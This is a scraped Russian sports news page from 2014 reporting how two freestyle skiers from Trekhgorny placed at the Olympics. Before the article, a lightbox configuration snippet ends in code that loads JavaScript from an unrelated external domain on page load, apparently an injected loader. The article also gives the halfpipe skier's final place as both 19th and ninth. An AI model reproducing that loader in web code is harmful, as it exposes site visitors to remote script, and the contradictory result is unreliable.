, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Южноуральские райдеры не смогли зацепиться за олимпийские медали

Ближе всего к наградам был наш Егор Коротков. По итогам соревнований в дисциплине ски-кросс он занял пятое место. А вот дебютантка игр – 17-летняя Елизавета Чеснокова – заняла только итоговое 19 место в дисциплине ски-хафпайп.

По итогам квалификационных заездов представитель Трехгорного Егор Коротков уверенно вышел в полуфинал. К сожалению, в полуфинальном заезде южноуралец допустил досадную ошибку и остался вне главного заезда. В так называемом малом финале Коротков стал лучшим и в итоге занял пятое место.

Елизавета Чеснокова, также представляющая Трехгорный, впервые в карьере принимала участие в Олимпийских играх. Спорсменка представляла честь нашей страны в дисциплине ски-хафпайп. По итогам двух квалификационных заездов Лиза не смогла пройти отбор в финал соревнований. В итоговом протоколе Чеснокова оказалась девятой.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
13:29 - 21 февраля 2014
|
автор: U-RSS
|
(474)
|
(0)

Комментарии (0)

Я человек
Я бот